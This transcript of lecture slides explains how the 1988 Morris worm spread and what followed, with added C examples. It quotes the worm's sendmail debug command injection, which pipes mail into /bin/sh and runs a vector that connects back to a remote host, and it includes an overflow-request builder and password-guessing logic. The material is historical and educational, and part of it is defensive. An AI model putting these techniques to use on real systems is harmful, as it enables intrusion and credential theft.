Crisis And Aftermath (PowerPoint presentation transcript)
Reviewed by Yunkyu Sung ([email protected])
Contents
- Introduction
- Worm vs. Virus
- Worm History
- Example
- How the worm operated
- Crisis
- Aftermath
Worm vs. Virus
                          Worm                                   Virus
Can run independently?    Yes                                    No
How does it operate?      Consumes the resources of its host     Inserts itself into one of the host's programs
When is it invoked?       By itself                              When the infected program runs
Worm History
- 1975: John Brunner's science fiction novel describes a "worm" program
- 1981: Xerox PARC experiments with worm programs
- 1988: the Internet worm analysed in this paper is released
- ...
- 2003: SQL Slammer worm (the "1.25 Internet Crisis" in Korea)

The 1.25 Internet Crisis of 2003
On January 25, 2003 the Slammer worm, which targets Microsoft SQL Server, became active. It spreads by sending a single 404-byte packet to 1434/udp (the SQL Server Resolution Service port).
finger
- finger lets a user obtain information about other users over TCP/IP.
- Common UNIX systems run a finger daemon (fingerd).
- The worm broke into fingerd through a buffer overrun: fingerd read the request line with gets(), which has no length limit.
finger (cont'd)
Example: fingerd reads the request into a fixed-size buffer, e.g. char buf[10]. gets() keeps writing past the end of the buffer, so any line of more than 9 characters overflows it (gets() also stores the terminating NUL).
When the buffer overflows:
- Normal case: the process corrupts its own stack, dumps core and exits.
- The worm: the overflowing bytes were chosen to overwrite the saved stack information (the return address), so that the function "returns" into the worm's code instead of to its caller. From that point the worm's code runs on its own.
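The overrun described above, as an added example (not code from the paper or these slides): a C model of fingerd's input routine in which the stack frame is a flat byte array with a 10-byte buffer at the bottom and a saved return address above it. The offsets, the "legitimate" return address and the attacker's address are made up for illustration; the two copy routines mirror what gets() and fgets() do with the same input.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not code from the paper or the slides. The stack frame of
 * fingerd's input routine is modelled as a flat byte array: a 10-byte line
 * buffer at the bottom and the saved return address further up. Offsets and
 * the "legitimate" return address are made up for illustration. */
#define BUF_SIZE     10            /* char buf[10] as on the slide            */
#define RET_OFFSET   28            /* where the saved return address lives    */
#define FRAME_SIZE   40            /* slack above the slot so the model itself
                                      never writes outside the array          */
#define LEGIT_RETURN 0x00401234u   /* made-up address of fingerd's caller     */

/* The gets()-style bug: copy the line into the buffer with no length bound.
 * Everything after byte 9 lands on top of whatever follows the buffer. */
static void unsafe_gets_into(char *frame, const char *input)
{
    char *dst = frame;
    while (*input != '\0' && *input != '\n')
        *dst++ = *input++;
    *dst = '\0';
}

/* The fix (what fgets(buf, sizeof buf, stdin) does): at most BUF_SIZE bytes
 * including the terminating NUL; extra input is simply not stored. */
static void safe_fgets_into(char *frame, const char *input)
{
    size_t i = 0;
    while (i < BUF_SIZE - 1 && input[i] != '\0' && input[i] != '\n') {
        frame[i] = input[i];
        i++;
    }
    frame[i] = '\0';
}

/* Process one finger request line and report the saved return address the
 * routine would "return" to afterwards. */
uint32_t saved_return_after(int use_safe, const char *request)
{
    char frame[FRAME_SIZE];
    uint32_t legit = LEGIT_RETURN, ret;

    memset(frame, 0, sizeof frame);
    memcpy(frame + RET_OFFSET, &legit, sizeof legit);
    if (use_safe)
        safe_fgets_into(frame, request);
    else
        unsafe_gets_into(frame, request);
    memcpy(&ret, frame + RET_OFFSET, sizeof ret);
    return ret;
}

/* Build the kind of request the worm sent: padding up to the return slot,
 * then the 4-byte address it wants fingerd to jump to (in the real attack,
 * code in the buffer that called execve("/bin/sh", 0, 0)). The address bytes
 * must contain no NUL or newline, or gets() would stop copying early. */
int build_overrun_request(char *out, size_t outlen, uint32_t target)
{
    if (outlen < RET_OFFSET + sizeof target + 1)
        return -1;
    memset(out, 'A', RET_OFFSET);
    memcpy(out + RET_OFFSET, &target, sizeof target);
    out[RET_OFFSET + sizeof target] = '\0';
    return 0;
}

/* Where does control go for a constructed attack line, with the vulnerable
 * (use_safe == 0) or the fixed copy routine? */
uint32_t demo(int use_safe)
{
    char request[64];
    const uint32_t attacker_addr = 0x41424344u;   /* arbitrary; no 0x00/0x0a bytes */

    if (build_overrun_request(request, sizeof request, attacker_addr) != 0)
        return 0;
    return saved_return_after(use_safe, request);
}

int main(void)
{
    printf("normal request, gets():  0x%08x\n", (unsigned)saved_return_after(0, "bob\n"));
    printf("attack request, gets():  0x%08x\n", (unsigned)demo(0));
    printf("attack request, fgets(): 0x%08x\n", (unsigned)demo(1));
    return 0;
}
```

With the unbounded copy the attack line replaces the saved return address with the attacker's value; with the bounded copy the same line is truncated to 9 characters and the return slot is untouched. A line that overflows the buffer but is shorter than the distance to the slot corrupts the frame without redirecting control, which is the "core dumped" case on the slide.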
sendmail
- sendmail is the mailer program that routes mail across a heterogeneous network.
- With its debug option, a tester can run programs that display the state of the mail system without sending mail or establishing a separate login connection.
- The worm used the debug option to hand sendmail a set of shell commands in place of a recipient address.
password
Password mechanism in UNIX:
1. The user enters a password.
2. It is run through the one-way crypt() function (based on the Data Encryption Standard).
3. The result is compared with the previously stored encrypted password.
4. If they match, access is granted.
Trusted logins exist to avoid having to repeatedly type passwords: rlogin/rsh from a trusted host (one listed in /etc/hosts.equiv or in the user's .rhosts) runs without password checking.
How the worm operated
- Main program: the worm proper; collects information about other machines on the network and attacks them.
- Vector program: a small bootstrap placed on a target machine using the information obtained; it connects back to the infecting machine and pulls over the rest of the worm.
How the worm operated (cont'd)
How it works:
1. Connect to the target.
2. Transfer the source code of each part.
3. Compile it.
4. Run it.
5. Collect information.
6. Try to connect to other machines.
Step 1, 2 : Connection & Send
1. A socket is established between the vector and the infecting machine.
2. The vector source is delivered by one of two methods:
   2.1 through a TCP connection to /bin/sh (a shell obtained via rsh or the finger attack)
   2.2 through SMTP (the sendmail debug command)
Step 2 : Connection (cont'd)
Method 2.1, over a shell: the worm writes the vector source with echo, line by line:
    echo ..... > x14481910.c
    [text of vector..]
Method 2.2, over SMTP, using the sendmail debug command:
    debug
    mail from: </dev/null>
    rcpt to: <"|sed -e '1,/^$/'d | /bin/sh ; exit 0">
    data
    cd /usr/tmp
    cat > x14481910.c << 'EOF'
    [text of vector ..]
    EOF
    cc -o x14481910 x14481910.c;./x14481910 128.32.134.16 32341 8712440;rm -f x14481910 x14481910.c
    .
    quit
The "recipient" is a pipe into sed and /bin/sh: sed deletes everything up to the first blank line (the mail headers), so the message body is executed as a shell script. The three arguments to the compiled vector are the infecting host's address, the port to connect back to, and a magic number.
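As an added example (not from the paper or the slides), a check that runs over a captured SMTP command stream and flags the two features the worm's session relied on: the debug verb, and a recipient that is a shell pipe rather than a mailbox. The log lines, their layout and the finding names are constructed for this example.

```c
#include <ctype.h>
#include <string.h>

/* Added example, not code from the paper or the slides. Classifies client
 * command lines from an SMTP session; the session lines are constructed. */
#define SMTP_DEBUG_VERB 1   /* client issued the sendmail "debug" command      */
#define SMTP_PIPE_RCPT  2   /* RCPT TO names a pipe ("|cmd") instead of a user */

/* Case-insensitive prefix match; safe when s is shorter than prefix. */
static int starts_with_ci(const char *s, const char *prefix)
{
    for (; *prefix; s++, prefix++)
        if (tolower((unsigned char)*s) != tolower((unsigned char)*prefix))
            return 0;
    return 1;
}

/* Classify one command line; returns a bitmask of findings. */
int classify_smtp_command(const char *line)
{
    int findings = 0;

    /* "debug" as a whole verb, not e.g. a HELO argument that contains it */
    if (starts_with_ci(line, "debug") &&
        (line[5] == '\0' || isspace((unsigned char)line[5])))
        findings |= SMTP_DEBUG_VERB;

    /* the worm's recipient was <"|sed -e '1,/^$/'d | /bin/sh ; exit 0"> */
    if (starts_with_ci(line, "rcpt to:") && strchr(line + 8, '|') != NULL)
        findings |= SMTP_PIPE_RCPT;

    return findings;
}

/* Scan a whole session; returns the OR of all findings. */
int scan_smtp_session(const char *const *lines, int count)
{
    int all = 0;
    for (int i = 0; i < count; i++)
        all |= classify_smtp_command(lines[i]);
    return all;
}

#define NLINES(a) ((int)(sizeof (a) / sizeof (a)[0]))

/* Constructed sessions: an ordinary delivery, and one shaped like the worm's. */
static const char *const benign_session[] = {
    "helo mailhost",
    "mail from: <alice@example>",
    "rcpt to: <bob@example>",
    "data",
    "quit",
};
static const char *const worm_session[] = {
    "debug",
    "mail from: </dev/null>",
    "rcpt to: <\"|sed -e '1,/^$/'d | /bin/sh ; exit 0\">",
    "data",
    "cd /usr/tmp",
    "quit",
};

int benign_findings(void) { return scan_smtp_session(benign_session, NLINES(benign_session)); }
int worm_findings(void)   { return scan_smtp_session(worm_session,   NLINES(worm_session)); }
```

Either finding on its own is worth an alert: a pipe recipient arriving over the network should never be accepted, and a production sendmail has no business answering a debug command at all.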
Step 3 : file transfer
- The vector connects back to the "server" (the infecting machine), which transfers three files:
  - the Sun-3 binary of the worm
  - the VAX binary of the worm
  - the source code of the vector itself
- The vector then turns itself into a shell (via execl) with its input and output still connected to the server.
Step 4 : Infect Host
The server sent this command stream to the connected shell:
    PATH=/bin:/usr/bin:/usr/ucb
    rm -f sh
    if [ -f sh ]
    then
        P=x14481910
    else
        P=sh
    fi
Then, for each binary (Sun-3 and VAX):
    cc -o $P x14481910,sun3.o
    ./$P -p $$ x14481910,sun3.o x14481910,vax.o x14481910,l1.c
    rm -f $P
The -p $$ argument passes the shell's process id so the new worm can kill its parent later; naming the binary sh makes it look like an ordinary shell in process listings.
Step 5 : Hide Worm
The new worm hides itself by:
- obscuring its argument vector
- unlinking the binary version of itself
- killing its parent
- reading the worm files into memory, encrypting them, and deleting them from disk
Step 6 : Information gathering
The worm gathers information about:
- the network interfaces
- the hosts to which the local machine is connected
using ioctl and netstat, and builds lists of these in memory.
Step 7 : reachability
For each candidate host the worm checks its connection status: is it directly connected? What type of host is it (gateway or local host)? It then tests reachability by trying to connect to the host's telnet or rexec port.
Step 8 : Infection Attempts
- Attack via rsh (/usr/bin/rsh, /bin/rsh), which can be used without password checking from a trusted host. If successful, go to step 1 and step 2.1.
- Finger stack overflow attack: the return address in the stack frame of fingerd's main routine is changed so that fingerd executes execve("/bin/sh", 0, 0). If successful, go to step 1 and step 2.1.
- Connection to SMTP (the sendmail debug command): go to step 2.2.
Step 9 : infected machine information
1. Collect information from /etc/hosts.equiv, /.rhosts, /etc/passwd and users' .forward files.
2. Crack passwords using simple choices.
3. Crack passwords with an internal dictionary of words.
4. Crack passwords with /usr/dict/words.
5. Loop forever trying to infect the hosts in its internal tables.
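The password mechanism described earlier and the three cracking phases of Step 9, as one added example (not the worm's code or the paper's): a guess generator that works through the simple choices derived from a /etc/passwd entry, then an internal word list, then a system dictionary, stopping at the first match. The verifier is a callback, since the worm's own fast crypt() reimplementation is not shown here; the stand-in used to run the example compares plaintext, and the simple-choice set and both word lists are constructed for the example, not taken from the worm.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not code from the paper or the slides. Shape of the worm's
 * password attack: per /etc/passwd entry, try "simple" guesses built from
 * the entry, then a built-in word list, then the system dictionary, and stop
 * at the first hit. The simple-choice set and both lists are constructed. */

struct passwd_entry {
    const char *user;
    const char *gecos;   /* "First Last", as in the GECOS field */
    const char *stored;  /* the stored password field */
};

/* Returns non-zero when guess matches the stored field. */
typedef int (*verify_fn)(const char *guess, const char *stored);

static int try_list(const char *const *list, int n, const char *stored,
                    verify_fn verify, char *hit, size_t hitlen)
{
    for (int i = 0; i < n; i++) {
        if (verify(list[i], stored)) {
            snprintf(hit, hitlen, "%s", list[i]);
            return 1;
        }
    }
    return 0;
}

/* Phase 1: guesses derived from the account itself (assumed set: empty
 * password, user name, user name doubled, first name, last name, user name
 * reversed). */
static int try_simple_choices(const struct passwd_entry *e, verify_fn verify,
                              char *hit, size_t hitlen)
{
    char doubled[64], reversed[32], first[32] = "", last[32] = "";
    size_t len = strlen(e->user);
    size_t m = len < sizeof reversed - 1 ? len : sizeof reversed - 1;

    sscanf(e->gecos, "%31s %31s", first, last);
    snprintf(doubled, sizeof doubled, "%s%s", e->user, e->user);
    for (size_t i = 0; i < m; i++)
        reversed[i] = e->user[len - 1 - i];
    reversed[m] = '\0';

    const char *const cands[] = { "", e->user, doubled, first, last, reversed };
    return try_list(cands, 6, e->stored, verify, hit, hitlen);
}

/* Phase 2 (worm-internal list) and phase 3 (/usr/dict/words): tiny
 * constructed samples standing in for the real lists. */
static const char *const internal_dict[] = { "aaa", "academia", "aerobics", "airplane", "albany" };
static const char *const system_words[]  = { "apple", "banana", "cherry", "orange" };

/* Returns the phase (1, 2 or 3) that found the password, or 0; the winning
 * guess is copied into hit. */
int crack_account(const struct passwd_entry *e, verify_fn verify, char *hit, size_t hitlen)
{
    if (try_simple_choices(e, verify, hit, hitlen)) return 1;
    if (try_list(internal_dict, 5, e->stored, verify, hit, hitlen)) return 2;
    if (try_list(system_words, 4, e->stored, verify, hit, hitlen)) return 3;
    return 0;
}

/* Stand-in verifier: plain string compare. Against a real password file this
 * would be strcmp(crypt(guess, stored), stored) == 0, the salt coming from
 * the stored field. */
int plaintext_verify(const char *guess, const char *stored)
{
    return strcmp(guess, stored) == 0;
}

/* Run the attack on one constructed entry and return the phase that hit. */
int demo_phase(const char *user, const char *gecos, const char *stored)
{
    struct passwd_entry e = { user, gecos, stored };
    char hit[64];
    int phase = crack_account(&e, plaintext_verify, hit, sizeof hit);
    if (phase)
        printf("%s: found \"%s\" in phase %d\n", user, hit, phase);
    return phase;
}
```

The attack worked because /etc/passwd, hashes included, was world-readable and crypt() was cheap enough to run over a dictionary for every account; with a shadowed password file the generator has nothing to verify against, and a slow hash makes even the simple-choice phase expensive.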
Step 10
Break into remote machines:
- read .forward and .rhosts for user accounts on other hosts
- create the remote shell:
  - via the remote rexec service: rexec to the current host as the cracked account
  - via rsh to the remote host, which succeeds when the .rhosts or hosts.equiv file on the remote server trusts this machine
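As an added example (not from the paper or the slides), a reader for the hosts.equiv and .rhosts trust files that Step 10 relies on: it answers whether a given remote user on a given host would get an rsh/rlogin shell as a given local account with no password, and counts entries that extend that trust to every host. The matching rules are a simplified form of the BSD ones, and the sample files are constructed.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not code from the paper or the slides. Minimal reader for
 * /etc/hosts.equiv and ~/.rhosts. Rules used here (simplified BSD form):
 * each line is "host [user]"; "+" in a field matches anything; with no user
 * field the remote user must have the same name as the local account; a
 * leading "-" on the host denies; the first matching line decides. */

struct trust_entry {
    char host[64];
    char user[32];   /* empty: remote user must equal the local account */
    int  deny;
};

/* Parses "host [user]"; returns 0 for blank or comment lines. */
static int parse_trust_line(const char *line, struct trust_entry *out)
{
    char h[64] = "", u[32] = "";
    if (sscanf(line, "%63s %31s", h, u) < 1 || h[0] == '#')
        return 0;
    out->deny = 0;
    if (h[0] == '-' && h[1] != '\0') {
        out->deny = 1;
        memmove(h, h + 1, strlen(h));   /* drop the "-", NUL included */
    }
    snprintf(out->host, sizeof out->host, "%s", h);
    snprintf(out->user, sizeof out->user, "%s", u);
    return 1;
}

static int field_matches(const char *pattern, const char *value)
{
    return strcmp(pattern, "+") == 0 || strcmp(pattern, value) == 0;
}

/* Would remote_user on host get a shell as local_user with no password? */
int trust_allows(const char *const *lines, int n, const char *host,
                 const char *remote_user, const char *local_user)
{
    for (int i = 0; i < n; i++) {
        struct trust_entry e;
        if (!parse_trust_line(lines[i], &e) || !field_matches(e.host, host))
            continue;
        int user_ok = e.user[0] ? field_matches(e.user, remote_user)
                                : strcmp(remote_user, local_user) == 0;
        if (user_ok)
            return e.deny ? 0 : 1;
    }
    return 0;   /* no matching entry: a password is required */
}

/* Audit helper: entries whose host field is "+", i.e. trust extended to
 * every machine that can reach this one. */
int count_wildcard_hosts(const char *const *lines, int n)
{
    int count = 0;
    for (int i = 0; i < n; i++) {
        struct trust_entry e;
        if (parse_trust_line(lines[i], &e) && !e.deny && strcmp(e.host, "+") == 0)
            count++;
    }
    return count;
}

/* Constructed sample files. */
static const char *const careful_rhosts[] = {
    "# machines in our own cluster",
    "cs-gw",            /* same-named accounts on cs-gw, no password      */
    "cs-vax alice",     /* alice on cs-vax may log in as this account     */
    "-badhost",         /* explicitly denied                              */
};
static const char *const sloppy_rhosts[] = { "+" };   /* any host, same-named account */

int careful_allows(const char *host, const char *ru, const char *lu)
{ return trust_allows(careful_rhosts, 4, host, ru, lu); }
int sloppy_allows(const char *host, const char *ru, const char *lu)
{ return trust_allows(sloppy_rhosts, 1, host, ru, lu); }
int careful_wildcards(void) { return count_wildcard_hosts(careful_rhosts, 4); }
int sloppy_wildcards(void)  { return count_wildcard_hosts(sloppy_rhosts, 1); }
```

The point for the worm is the second file: one "+" line turns every cracked account on any machine into a passwordless entry point, and a user-owned .rhosts means the administrator never sees it.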
Characteristics
- Checks whether another worm is already running; one in seven worms ignores the check and becomes "immortal"
- Forks itself and kills the parent
- Re-infects the same machine every 12 hours
- There is no stop code
Aftermath
- The first large-scale Internet worm incident: around 6000 major UNIX machines were infected (about 10% of the network at that time)
- Important nationwide gateways were shut down
- The appropriate punishment became a topic of debate

Then ...
- Robert T. Morris was prosecuted; he said he had only wanted to build a tool to gauge the size of the Internet
- Sentence: 3 years' probation, a fine and community service
- The Computer Emergency Response Team (CERT) was established